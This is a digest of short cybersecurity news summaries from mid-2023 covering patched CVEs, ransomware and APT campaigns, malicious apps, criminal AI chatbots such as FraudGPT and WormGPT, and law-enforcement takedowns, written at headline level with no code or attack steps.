As part of the August Patch Tuesday, Microsoft patched 87 flaws, two of which were actively exploited zero-days. In total, the tech giant released fixes for 18 Elevation of Privilege vulnerabilities, 3 Security Feature Bypass vulnerabilities, 23 Remote Code Execution vulnerabilities, 10 Information Disclosure vulnerabilities, 8 Denial of Service vulnerabilities, and 12 Spoofing vulnerabilities.

Notorious Phishing-as-a-Service Platform Shuttered

A phishing-as-a-service (PaaS) platform which may have been responsible for over 150,000 phishing domains has been taken offline after an Interpol-led operation, the policing group said. Interpol teamed up with investigators in Indonesia, Japan and the US and industry partners the Cyber Defense Institute, Group-IB, Palo Alto Networks Unit 42, Trend Micro and Cybertoolbelt to make the arrests.

LockBit Threatens to Leak Medical Data of Cancer Patients Stolen from Varian Medical Systems

The LockBit ransomware group has claimed responsibility for hacking Varian Medical Systems, a healthcare company that designs and manufactures medical devices and software for cancer treatment. The group threatens to leak medical data belonging to cancer patients. Varian Medical Systems operates globally and is owned by Siemens Healthineers, generating significant revenue.

Google Play Apps With 2.5M Installs Load Ads When Screen's Off

The Google Play store was infiltrated by 43 Android applications with 2.5 million installs that secretly displayed advertisements while a phone's screen was off, running down a device's battery. McAfee's Mobile Research Team discovered the malicious Android apps and reported them to Google as they violated Google Play Store's policies.

North Korean Hackers ‘Scarcruft’ Breached Russian Missile Maker

The cyberattack on the IT systems and email server of NPO Mashinostroyeniya, a Russian organization specializing in space rocket design and intercontinental ballistic missile engineering, has been attributed to the North Korean state-sponsored hacking group ScarCruft. This group has a history of engaging in cyber activities with links to various targets.

Researchers Uncover New High-Severity Vulnerability in PaperCut Software

Horizon3 researchers recently disclosed a new high-severity vulnerability in PaperCut print management software for Windows that could result in remote code execution in certain configurations. Tracked as CVE-2023-39143, the flaw impacts PaperCut NG/MF prior to version 22.1.3. A successful exploit of CVE-2023-39143 could potentially allow unauthenticated attackers to read, delete, and upload arbitrary files to the PaperCut MF/NG application server.

Colorado Department of Higher Education Warns of Massive Data Breach

The Colorado Department of Higher Education (CDHE) has disclosed a massive data breach impacting students, past students, and teachers after suffering a ransomware attack in June. In a 'Notice of Data Incident' published on the CDHE website, the Department says it suffered a ransomware attack on June 19th, 2023. When ransomware gangs breach an organization, they quietly spread through a network while stealing sensitive data and files from computers and servers.

Clop Ransomware Now Uses Torrents to Leak Data and Evade Takedowns

The Clop ransomware gang has changed their extortion approach once more, now employing torrents to release the data they stole during MOVEit attacks. The ransomware gang started extorting victims on June 14 by gradually adding names to their Tor data leak site and eventually making the files public. However, the slow download speed on Tor sites limited the potential damage.

Russian Hacktivists Overwhelm Spanish Sites With DDoS

A leading Spanish research institute has become the latest organization in the country to come under cyber-attack from Russia, after a weeks-long DDoS campaign that appears to be geopolitically motivated. Local reports claimed that prolific hacktivist group NoName057 is responsible for the DDoS blitz, which impacted at least 72 websites between July 19 and 30.

New Acoustic Attack Steals Data from Keystrokes with 95% Accuracy

A team of researchers from British universities has developed a deep learning model called 'CoAtNet' that can perform acoustic attacks by stealing data from keyboard keystrokes recorded using a microphone. The model achieved an alarming accuracy of 95% in predicting the keystrokes, showcasing the potential danger of sound-based side-channel attacks. The study reveals that even when using platforms like Zoom for training, the prediction accuracy only dropped slightly to 93%, which is still a significant threat.

OT/IoT Malware Surges Tenfold in First Half of the Year

Malware-related cyber-threats in operational technology (OT) and Internet of Things (IoT) environments jumped tenfold year-on-year in the first six months of 2023, according to Nozomi Networks. In their latest “OT & IoT Security Report” the researchers shared ICS vulnerabilities, data from IoT honeypots and attack statistics from OT environments. “Specific to malware, denial-of-service (DoS) activity remains one of the most prevalent attacks against OT systems,” the vendor explained in a blog post announcing the report.

Hackers Use New Malware to Breach Air-gapped Devices in Eastern Europe

Chinese state-sponsored hackers have been targeting industrial organizations with new malware that can steal data from air-gapped systems. Air-gapped systems typically fulfill critical roles and are isolated from the enterprise network and the public internet either physically or through software and network devices. Researchers at cybersecurity company Kaspersky discovered the new malware and attributed it to the cyber-espionage group APT31, a.k.a. Zirconium.

Ransomware Attacks on Industrial Organizations Doubled in Past Year: Report

The number of ransomware attacks targeting industrial organizations and infrastructure has doubled since the second quarter of 2022, according to data from industrial cybersecurity firm Dragos. In a report analyzing data from the second quarter of 2023, Dragos said it saw 253 ransomware incidents, up 18% from the first quarter of 2023, when it observed 214 attacks.

Hackers Steal Signal, WhatsApp User Data With Fake Android Chat App

Hackers are using a fake Android app named 'SafeChat' to infect devices with spyware malware that steals call logs, texts, and GPS locations from phones. The Android spyware is suspected to be a variant of "Coverlm," which steals data from communication apps such as Telegram, Signal, WhatsApp, Viber, and Facebook Messenger. CYFIRMA researchers say the Indian APT hacking group 'Bahamut' is behind the campaign, with their latest attacks conducted mainly through spear phishing messages on WhatsApp that send the malicious payloads directly to the victim.

Experts Discovered a Previously Undocumented Initial Access Vector Used by P2PInfect Worm

In July, researchers from Palo Alto Networks Unit 42 discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers on Linux and Windows systems. P2PInfect is written in Rust and exploits the CVE-2022-0543 vulnerability to gain initial access. It establishes P2P communication to the network and has been found on over 307,000 unique public Redis systems in the past two weeks, with 934 possibly vulnerable. The worm's goal and the threat actors behind it remain unclear.

Cybercriminals Train AI Chatbots for Phishing, Malware Attacks

In the wake of WormGPT, a ChatGPT clone trained on malware-focused data, a new generative artificial intelligence hacking tool called FraudGPT has emerged, and at least another one is under development that is allegedly based on Google's AI experiment, Bard. Both AI-powered bots are the work of the same individual, who appears to be deep in the game of providing chatbots trained specifically for malicious purposes ranging from phishing and social engineering, to exploiting vulnerabilities and creating malware.

Experts Warn Attackers Started Exploiting Citrix ShareFile RCE Flaw CVE-2023-24489

Citrix ShareFile is a widely used cloud-based file-sharing application, which is affected by a critical remote code execution (RCE) flaw tracked as CVE-2023-24489 (CVSS score of 9.1). The flaw impacts the customer-managed ShareFile storage zones controller; an unauthenticated, remote attacker can trigger it to compromise the controller by uploading arbitrary files or executing arbitrary code.

CISA: New Submarine Malware Found on Hacked Barracuda ESG Appliances

In May, network and email security firm Barracuda disclosed that a recently patched remote command injection zero-day vulnerability had been exploited since October 2022 to gain access to a subset of its Email Security Gateway appliances. The flaw, tracked as CVE-2023-2868, was further exploited to deploy previously unknown malware dubbed Saltwater and SeaSpy, as well as a malicious tool called SeaSide to establish reverse shells for easy remote access. In light of the attacks, Barracuda offered replacement devices to all affected customers at no charge.

Linux Version of Abyss Locker Ransomware Targets VMware ESXi Servers

The Abyss Locker operation is the latest to develop a Linux encryptor to target VMware's ESXi virtual machines platform in attacks on the enterprise. As the enterprise shifts from individual servers to virtual machines for better resource management, performance, and disaster recovery, ransomware gangs create encryptors focused on targeting the platform.

Experts Link AVRecon Bot to the Malware Proxy Service SocksEscort

In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet, which targeted small office/home office (SOHO) routers and infected over 70,000 devices across 20 countries. The threat actors behind the campaign aimed to build a botnet for various criminal activities, including password spraying and digital advertising fraud.

Microsoft Fixes WSUS Servers Not Pushing Windows 11 22H2 Updates

Microsoft fixed a known issue impacting WSUS (Windows Server Update Services) servers upgraded to Windows Server 2022, causing them not to push Windows 11 22H2 updates to enterprise endpoints. While the updates would successfully download to the WSUS server, they failed to propagate further to client devices. The root cause stems from the accidental removal of .msu and .wim MIME types during the upgrade process to Windows Server 2022.

BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities

The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday.

Zimbra Patches Zero-Day Vulnerability Exploited in XSS Attacks

Zimbra recently addressed a zero-day vulnerability that was exploited in attacks targeting Zimbra Collaboration Suite email servers. Tracked as CVE-2023-38750, the flaw relates to a case of reflected Cross-Site Scripting impacting Zimbra Collaboration Suite Version 8.8.15, which could enable threat actors to steal sensitive information or execute arbitrary code on vulnerable systems. The flaw was uncovered by security researcher Clément Lecigne of Google Threat Analysis Group and was initially disclosed to the public two weeks ago.

High Severity Vulnerabilities Discovered in Ninja Forms Plugin

Multiple critical vulnerabilities have been detected in Ninja Forms, a widely used WordPress forms builder plugin with more than 900,000 active installations. The plugin, created by Saturday Drive, enables users to generate a wide range of forms such as contact forms, event registration, file uploads, and payments. Security researchers from Patchstack published a new advisory revealing the presence of the first vulnerability, which is a reflected cross-site scripting flaw based on POST requests.

BreachForums Database and Private Chats for Sale in Hacker Data Breach

While consumers are usually the ones worried about their information being exposed in data breaches, it's now the hacker's turn, as the notorious Breached cybercrime forum's database is up for sale and member data has been shared with Have I Been Pwned. Yesterday, the Have I Been Pwned data breach notification service announced that visitors can check if their information was exposed in a data breach of the Breached cybercrime forum.

Australia and US Issue Warning About Web App Threats

The Australian and US governments have issued a joint advisory about the growing cyber-threats to web applications and application programming interfaces (APIs). The guidance, Preventing Web Application Access Control Abuse, was released by the Australian Cyber Security Centre (ACSC), US Cybersecurity and Infrastructure Security Agency (CISA), and US National Security Agency (NSA) on July 27, 2023.

Repeatable VEC Attacks Target Critical Infrastructure

The incidence of vendor email compromise (VEC) attacks has surged, as recent data reveals a significant uptick in these cyber threats. A new report released yesterday by Abnormal Security, a cybersecurity firm, highlights the growing risk posed by VEC attacks, which are a variant of business email compromise.

New Nitrogen Malware Pushed via Google Ads For Ransomware Attacks

A new 'Nitrogen' initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads. The goal of the Nitrogen malware is to provide the threat actors initial access to corporate networks, allowing them to conduct data-theft, cyberespionage, and ultimately deploying the BlackCat/ALPHV ransomware.

NATO Investigates Alleged Data Theft by SiegedSec Hackers

NATO has confirmed that its IT team is investigating claims about an alleged data-theft hack on the Communities of Interest (COI) Cooperation Portal by a hacking group known as SiegedSec. The COI Cooperation Portal (dnbl.ncia.nato.int) is the military alliance's unclassified information-sharing and collaboration environment, dedicated to supporting NATO organizations and member nations. Yesterday, the hacking group 'SiegedSec' posted on Telegram what they claimed to be hundreds of documents stolen from the COI Cooperation Portal.

FraudGPT, A New Malicious Generative AI Tool Appears in the Threat Landscape

Generative AI models are becoming very attractive for crooks. Netenrich researchers recently spotted a new platform dubbed FraudGPT, which has been advertised on multiple marketplaces and a Telegram channel since July 22, 2023. According to Netenrich, this generative AI bot was trained for offensive purposes, such as creating spear phishing emails, conducting BEC attacks, cracking tools, and carding.

Microsoft Previews Defender for IoT Firmware Analysis Service

Microsoft announced a new Defender for IoT feature that will allow analyzing the firmware of embedded Linux devices like routers for security vulnerabilities and common weaknesses. Dubbed Firmware Analysis and now available in Public Preview, the new capability can detect a wide range of weaknesses, from hardcoded user accounts and outdated or vulnerable open-source packages to the use of a manufacturer's private cryptographic signing key.

ALPHV Ransomware Adds Data Leak API in New Extortion Strategy

The ALPHV ransomware gang, aka BlackCat, is now providing an API for their leak site to increase visibility for their attacks. Earlier this week, several researchers spotted a new page within the BlackCat leak site with instructions for using their API to collect timely updates about new victims. APIs, or Application Programming Interfaces, are typically used to enable communication between two software components based on agreed definitions and protocols.

VMware fixes bug exposing CF API admin credentials in Audit Logs

VMware recently fixed an information disclosure bug impacting its VMware Tanzu Application Service for VMs (TAS for VMs) and Isolation Segment. “TAS for VMs helps enterprises automate the deployment of applications across on-premises or public and private clouds (e.g., vSphere, AWS, Azure, GCP, OpenStack).” Tracked as CVE-2023-20891, the issue seems to be caused by credentials being logged and exposed via system audit logs.

Critical Vulnerabilities Found in Radio Encryption System

Security experts have discovered numerous vulnerabilities in a widely employed radio communication system, which is extensively used by law enforcement and critical infrastructure for transmitting data. These vulnerabilities could potentially enable remote decryption of cryptographically protected communications. Five vulnerabilities in Terrestrial Trunked Radio (TETRA), a European radio communication standard, have been identified by researchers from the Dutch security firm Midnight Blue.

Super Admin Elevation Bug Puts 900,000 MikroTik Devices at Risk

A critical severity 'Super Admin' privilege elevation flaw puts over 900,000 MikroTik RouterOS routers at risk, potentially enabling attackers to take full control over a device and remain undetected. The flaw, CVE-2023-30799, allows remote attackers with an existing admin account to elevate their privileges to "super-admin" via the device's Winbox or HTTP interface.

Over 400,000 Corporate Credentials Stolen by Info-stealing Malware

The analysis of nearly 20 million information-stealing malware logs sold on the dark web and Telegram channels revealed that they had achieved significant infiltration into business environments. Information stealers are malware that steals data stored in applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients, and gaming services. The stolen information is packaged into archives called 'logs,' which are then uploaded back to the threat actor for use in attacks or sold on cybercrime marketplaces.

Biden-Harris Administration Secures AI Commitments For Safety

The Biden-Harris Administration has taken a new step towards ensuring the responsible development of artificial intelligence (AI) technology by securing voluntary commitments from leading AI companies. As part of the new initiative, Amazon, Anthropic, Google, Inflection, Meta, Microsoft and OpenAI have pledged to prioritize safety, security and trust in their AI systems.

Norway Says Ivanti Zero-Day Was Used to Hack Govt IT Systems

The Norwegian National Security Authority (NSM) has confirmed that attackers used a zero-day vulnerability in Ivanti's Endpoint Manager Mobile (EPMM) solution to breach a software platform used by 12 ministries in the country. The Norwegian Security and Service Organization (DSS) said on Monday that the cyberattack did not affect Norway's Prime Minister's Office, the Ministry of Defense, the Ministry of Justice, and the Ministry of Foreign Affairs.

Lazarus Hackers Hijack Microsoft IIS Servers to Spread Malware

The Lazarus hacking group, sponsored by the North Korean state, is currently involved in breaching Windows Internet Information Service (IIS) web servers with the intention of taking control of these servers for distributing malware. IIS is a web server solution developed by Microsoft, commonly used to host websites or application services, including Microsoft Exchange’s Outlook on the web.

Clop Now Leaks Data Stolen in MoveIT Attacks on Clearweb Sites

The Clop ransomware group is emulating the tactics of the ALPHV ransomware gang by constructing dedicated internet-accessible websites for individual victims. “To overcome these obstacles, last year, the ALPHV ransomware operation, also known as BlackCat, introduced a new extortion tactic of creating clearweb websites to leak stolen data that were promoted as a way for employees to check if their data was leaked.”

New Variant of AsyncRAT Malware Spreading Through Pirated Software

According to researchers at Avast, a new variant of AsyncRAT is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. Dubbed HotRat, the remote access trojan has been seen in the wild since October 2022, with the majority of the infections located in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attack chain disclosed by Avast entails bundling cracked software available online via torrent sites with a malicious AutoHotKey (AHK) script.

New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection

Qualys Threat Research Unit recently uncovered a remote code execution vulnerability impacting OpenSSH’s forwarded ssh-agent, a background program that maintains users' keys in memory and facilitates remote logins to a server without having to enter their passphrase again. Tracked as CVE-2023-38408, the vulnerability impacts OpenSSH before 9.3p2 and can be exploited to execute arbitrary commands on a vulnerable OpenSSH forwarded ssh-agent. A successful exploit requires certain libraries to be present on the victim system and that the SSH authentication agent is forwarded to an attacker-controlled system.

Experts Warn of OSS Supply Chain Attacks Against the Banking Sector

In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector. These attacks targeted specific components in web assets used by banks, and according to the experts the attackers used advanced techniques. A threat actor leveraged the NPM platform to upload malicious packages that included malicious objects upon installation.

Critical AMI MegaRAC Bugs Can Let Hackers Brick Vulnerable Servers

Recently, American Megatrends International, a hardware and software company, identified two critical severity vulnerabilities in their MegaRAC Baseboard Management Controller software. The MegaRAC BMC software is designed to offer administrators “out of band” and “lights out” remote system management capabilities. This functionality allows administrators to troubleshoot servers as if they were physically present in front of the devices, even when operating remotely.

VirusTotal Apologizes For Data Leak Affecting 5,600 Customers

VirusTotal apologized on Friday for leaking the information of over 5,600 customers after an employee mistakenly uploaded a CSV file containing their info to the platform last month. The data leak impacted only Premium account customers, with the uploaded file containing their names and corporate email addresses. Emiliano Martinez, the online malware scanning service's head of product management, also assured impacted customers that the incident was caused by human error and was not the result of a cyber-attack or any vulnerability with VirusTotal.

DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks

Researchers at FortiGuard Labs have observed several distributed denial-of-service botnets exploiting a critical flaw in Zyxel devices to gain remote control of vulnerable systems. Tracked as CVE-2023-28771, the vulnerability is related to a command injection bug affecting multiple firewall models that could enable an unauthorized actor to execute arbitrary code via specially crafted packets sent to the targeted appliance.

Chinese APT41 Linked to WyrmSpy and DragonEgg Surveillanceware

Researchers at Lookout released a report on July 19, 2023, revealing that the Chinese espionage group APT41 is associated with the advanced Android surveillanceware known as WyrmSpy and DragonEgg. The report emphasized APT41’s well documented past of conducting espionage and seeking financial advantages by targeting government institutions and private companies.

Adobe Emergency Patch Fixes New ColdFusion Zero-Day Used in Attacks

Adobe recently published an emergency ColdFusion security update that addressed several vulnerabilities, including a new zero-day that was exploited in attacks in the wild. The zero-day tracked as CVE-2023-38205 is being described as an instance of improper access control that could result in a security bypass. Two other flaws were addressed, one of which was rated critical in severity while the other was rated medium in severity.

JumpCloud Breach Traced Back to North Korean State Hackers

US-based enterprise software company JumpCloud was breached by North Korean Lazarus Group hackers, according to security researchers at SentinelOne and CrowdStrike. In a report published on Thursday, SentinelOne Senior Threat Researcher Tom Hegel linked the North Korean threat group to the JumpCloud hack based on multiple indicators of compromise shared by the company in a recent incident report.

drIBAN Fraud Operations Target Corporate Banking Customers

Threat actors have extensively employed an advanced web-inject kit known as drIBAN to orchestrate fraudulent assaults on corporate banking institutions and their customers. As stated in a recent advisory from Cleafy security researchers, drIBAN was initially discovered in 2019. It utilizes customized JavaScript code to specifically target different entities within the corporate banking sector. Functioning as part of a Man-in-the-Browser attack, these web injects enable cyber criminals to manipulate the content of legitimate web pages in real time, circumventing the TLS protocol.

Ukraine Takes Down Massive Bot Farm, Seizes 150,000 SIM Cards

Ukraine’s Cyber Police Department has dismantled another massive bot farm linked to more than 100 individuals after researching nearly two dozen locations. The bots were allegedly used to promote Russian propaganda, justifying Russia’s invasion of Ukraine. The bots were also leveraged to spread illegal content and personal information and conduct other fraudulent activities.

Cybersecurity Firm Sophos Impersonated by New SophosEncrypt Ransomware

Cybersecurity researcher MalwareHunterTeam recently uncovered a new ransomware-as-a-service (RaaS) dubbed SophosEncrypt, which is allegedly impersonating Sophos. MalwareHunterTeam initially thought SophosEncrypt to be part of a red team exercise by Sophos; however, Sophos followed up on Twitter stating that they did not create the encryptor and are conducting an investigation. Taking a closer look at the sample uncovered by MalwareHunterTeam, the encryptor is written in the Rust programming language.

Security Alert: Social Engineering Campaign Targets Technology Industry Employees

GitHub has identified a low-volume social engineering campaign targeting personal accounts of employees in technology firms. The attackers use GitHub repository invitations and malicious npm package dependencies. The targets are often associated with blockchain, cryptocurrency, online gambling, or cybersecurity sectors. The threat actor behind this campaign is likely linked to North Korean objectives and has been identified as Jade Sleet or TraderTraitor.

U.S. Preparing Cyber Trust Mark for More Secure Smart Devices

A new cybersecurity certification and labeling program called U.S. Cyber Trust Mark is being shaped to help U.S. consumers choose connected devices that are more secure and resilient to hacker attacks. A proposal from the Federal Communications Commission, the program is expected to roll out next year with smart device vendors committing to it voluntarily.

Hackers Exploiting Critical WordPress Woocommerce Payments Bug

A critical vulnerability in the widely used WooCommerce Payments plugin is being exploited by hackers, enabling them to gain the privileges of any user, including administrators, on vulnerable WordPress installations. WooCommerce Payments is a highly popular WordPress plugin that facilitates credit and debit card payments in WooCommerce stores, with over 600,000 active installations, as reported by WordPress.

Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware

An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews. Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022.

Meet NoEscape: Avaddon ransomware gang's likely successor

The new NoEscape ransomware operation is believed to be a rebrand of Avaddon, a ransomware gang that shut down and released its decryption keys in 2021. NoEscape launched in June 2023 when it began targeting the enterprise in double-extortion attacks. As part of these attacks, the threat actors steal data and encrypt files on Windows, Linux, and VMware ESXi servers. The threat actors then threaten to publicly release stolen data if a ransom is not paid. BleepingComputer is aware of NoEscape ransomware demands ranging between hundreds of thousands of dollars to over $10 million. Like other ransomware gangs, NoEscape does not allow its members to target CIS (ex-Soviet Union) countries, with victims from those countries receiving free decryptors and information on how they were breached.

Google Cloud Build Bug Lets Hackers Launch Supply Chain Attacks

A critical design flaw in Google Cloud Build has been discovered by cloud security firm Orca Security, allowing hackers to launch supply chain attacks. The flaw, named Bad.Build, enables attackers to escalate privileges and gain unauthorized access to Google Artifact Registry code repositories. By impersonating the service account for Google Cloud Build, threat actors can run API calls against the artifact registry, inject malicious code into applications, and potentially compromise the entire supply chain.

FIN8 Deploys ALPHV Ransomware Using Sardonic Malware Variant

A financially motivated cybercrime gang has been observed deploying BlackCat ransomware payloads on networks backdoored using a revamped Sardonic malware version. Tracked as FIN8 (aka Syssphinx), this threat actor has been actively operating since at least January 2016, focusing on targeting industries such as retail, restaurants, hospitality, healthcare, and entertainment.

CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise

Last week, the computer emergency response team of Ukraine (CERT-UA) released an article disclosing details about a Russian-linked threat actor known as Gamaredon (aka Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010). Active since at least 2013, Gamaredon is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014.

AI Tool WormGPT Enables Convincing Fake Emails For BEC Attacks

New research conducted by security firm SlashNext reveals that cyber-criminals are utilizing a potent tool called WormGPT, a generative AI system, for carrying out business email compromise (BEC) attacks. Security expert Daniel Kelley observed a worrisome trend in online forums where cyber-criminals are offering “jailbreaks” for interfaces like ChatGPT. These jailbreaks are specialized prompts that aim to exploit ChatGPT by manipulating it to generate outputs involving sensitive information disclosure, inappropriate content generation, or even the execution of harmful code.

JumpCloud Discloses Breach by State-Backed APT Hacking Group

US-based enterprise software firm JumpCloud has disclosed a breach by a state-backed hacking group that occurred almost one month ago. The attack was highly targeted and focused on a limited set of customers. The breach was discovered on June 27 after the attackers gained access through a spear-phishing attack. Although no evidence of customer impact was found initially, JumpCloud decided to rotate credentials and rebuild compromised infrastructure.

A Deep Dive into the Packet Reflection Vulnerability Allowing Attackers to Plague Private 5G Networks

5G technology has bolstered productivity in modern-day factories, allowing multiple devices to be connected simultaneously, but 5G networks are not immune to cyberattacks. In our recent joint research effort with CTOne and the Telecom Technology Center (TTC), the official advisory group to Taiwan's National Communications Commission and Ministry of Digital Affairs, Trend Micro looked into ZDI-CAN-18522, a packet reflection vulnerability in the UPF of 5G cores (5GC).

Colorado State University says data breach impacts students, staff

Colorado State University (CSU) has confirmed that the Clop ransomware operation stole sensitive personal information of current and former students and employees during the recent MOVEit Transfer data-theft attacks. Colorado State University is a public research university with nearly 28,000 students and 6,000 academic and administrative staff members, operating on an endowment of $558,000,000.

New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries

A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon, making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year.

Cisco SD-WAN vManage Impacted by Unauthenticated REST API Access

The Cisco SD-WAN vManage management software is impacted by a flaw that allows an unauthenticated, remote attacker to gain read or limited write permissions to the configuration of the affected instance. Cisco SD-WAN vManage is a cloud-based solution allowing organizations to design, deploy, and manage distributed networks across multiple locations.

Popular WordPress Security Plugin Caught Logging Plaintext Passwords

A popular WordPress plugin dubbed All-In-One Security (AIOS) was found to log plaintext passwords from login attempts. With over one million installs on WordPress sites, AIOS is a security and firewall plugin designed to log user activity and prevent cyberattacks such as brute-force attempts by warning admins when the default admin username is used for login. Approximately two weeks ago, user reports started coming in about an insecure design flaw in the plugin.

Russian State Hackers Lure Western Diplomats With BMW Car Ads

The Russian state-backed hacking collective known as APT29 has been employing unique tactics such as offering car listings to attract diplomats in Ukraine into clicking on harmful links, which ultimately distribute malware. APT29 is affiliated with Russia’s Foreign Intelligence Service (SVR), and it has gained notoriety for executing multiple cyber-espionage operations aimed at influential individuals worldwide.

Fortinet Warns of Critical RCE flaw in FortiOS, FortiProxy Devices

Fortinet recently disclosed a critical severity flaw impacting FortiOS and FortiProxy that could enable remote attackers to execute arbitrary code on vulnerable devices. Tracked as CVE-2023-33308, the flaw was discovered and disclosed to Fortinet by cybersecurity firm Watchtowr. According to Fortinet, CVE-2023-33308 relates to a stack-based overflow vulnerability and could allow a remote attacker to execute arbitrary code or commands via crafted packets reaching proxy policies or firewall policies with proxy mode alongside SSL deep packet inspection.

Microsoft July 2023 Patch Tuesday Warns of 6 Zero-Days, 132 Flaws

As part of the July Patch Tuesday, Microsoft addressed 132 vulnerabilities, six of which were actively exploited zero-days. In total, there were 33 Elevation of Privilege Vulnerabilities, 13 Security Feature Bypass Vulnerabilities, 37 Remote Code Execution Vulnerabilities, 19 Information Disclosure Vulnerabilities, 22 Denial of Service Vulnerabilities, and 7 Spoofing Vulnerabilities. Out of the 132 flaws addressed, nine have been rated critical in severity.

Ransomware Payments on Record-Breaking Trajectory for 2023

Data from the first half of the year indicates that ransomware activity is on track to break previous records, seeing a rise in the number of payments, both big and small. According to a report by blockchain analysis firm Chainalysis, ransomware is the only cryptocurrency crime category seeing a rise this year, with all others, including hacks, scams, malware, abuse material sales, fraud shops, and darknet market revenue, recording a steep decline. "In fact, ransomware attackers are on pace for their second-biggest year ever, having extorted at least $449.1 million through June."

Experts Released PoC exploit for Ubiquiti EdgeRouter Flaw

A Proof-of-Concept (PoC) exploit for the CVE-2023-31998 vulnerability in the Ubiquiti EdgeRouter has been publicly released. The CVE-2023-31998 flaw (CVSS v3 5.9) is a heap overflow issue impacting Ubiquiti EdgeRouters and AirCubes; an attacker can exploit it to potentially execute arbitrary code and interrupt the UPnP service on a vulnerable device.

Owncast, EaseProbe Security Vulnerabilities Revealed

Oxeye has uncovered two critical security vulnerabilities and recommends immediate action to mitigate risk. The vulnerabilities were discovered in Owncast (CVE-2023-3188) and EaseProbe (CVE-2023-33967), two open-source platforms written in Go. The first vulnerability was discovered in Owncast, an open-source, self-hosted, decentralized, single-user live video streaming and chat server written in Go.

VMware Warns of Exploit Available for Critical vRealize RCE Bug

VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments. The flaw (CVE-2023-20864) is a deserialization weakness patched in April, and it allows unauthenticated attackers to gain remote execution on unpatched appliances.

RomCom RAT Targeting NATO and Ukraine Support Groups

The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023.

New TOITOIN Banking Trojan Targeting Latin American Businesses

Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. ‘This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage,’ Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week.

Charming Kitten Hackers Use New ‘NokNok’ Malware for macOS

Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems. The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group.

Apps with 1.5M installs on Google Play send your data to China

Security researchers discovered two malicious file management applications on Google Play with a collective installation count of over 1.5 million that collected excessive user data that goes well beyond what's needed to offer the promised functionality. The apps, both from the same publisher, can launch without any interaction from the user to steal sensitive data and send it to servers in China.

Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities

For the month of June, Google released patches for 46 software vulnerabilities, some of which were actively exploited in attacks in the wild. Among the vulnerabilities addressed is a memory leak flaw impacting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. Tracked as CVE-2023-26083, the bug was exploited in a previous attack that enabled spyware infiltration on Samsung devices in December 2022. Another serious vulnerability addressed is CVE-2021-29256, a high-severity issue impacting specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers.

Iranian Hacking Group Impersonating Nuclear Experts to Gain Intel From Western Think Tanks

Researchers at Proofpoint have revealed that a cyber espionage group associated with the Iranian government has been engaging in phishing attacks targeting Middle Eastern nuclear weapons experts by impersonating employees of think tanks. The group, known by various names such as TA453, Charming Kitten, or APT35, has a history of targeting government officials, politicians, think tanks, and critical infrastructure entities in the United States and Europe.

MOVEit Transfer Customers Warned to Patch New Critical Flaw

MOVEit Transfer, the software at the center of the recent massive spree of Clop ransomware breaches, has received an update that fixes a critical-severity SQL injection bug and two other less severe vulnerabilities. SQL injection vulnerabilities let an attacker smuggle SQL syntax into a query built from user-supplied input, which can be used to read or tamper with the database or, depending on the database and its privileges, to execute code. For these attacks to be possible, the target application must fail to properly sanitize or parameterize the data it passes to the database.

International Police Arrest Head of Opera1er Cybercrime Gang

International law enforcement agencies have announced the arrest of the leader of a cybercriminal syndicate called Opera1er, responsible for over 30 successful cyberattacks targeting financial institutions, banks, mobile banking services, and telecommunications companies. The group, also known as Desktop-Group and NXSMS, was involved in various scams, including malware, phishing, and business email compromise, resulting in an estimated $30 million in stolen funds. Interpol, along with AFRIPOL, Group-IB, the Direction de l'Information et des Traces Technologiques, and the Orange CERT Coordination Center, led the operation, named Nervone. The arrest took place in early June in Abidjan, Côte d'Ivoire. Group-IB, which had been tracking the Opera1er group since 2018, provided crucial intelligence that helped identify the leader's identity and potential location.

Over 130,000 Solar Energy Monitoring Systems Exposed Online

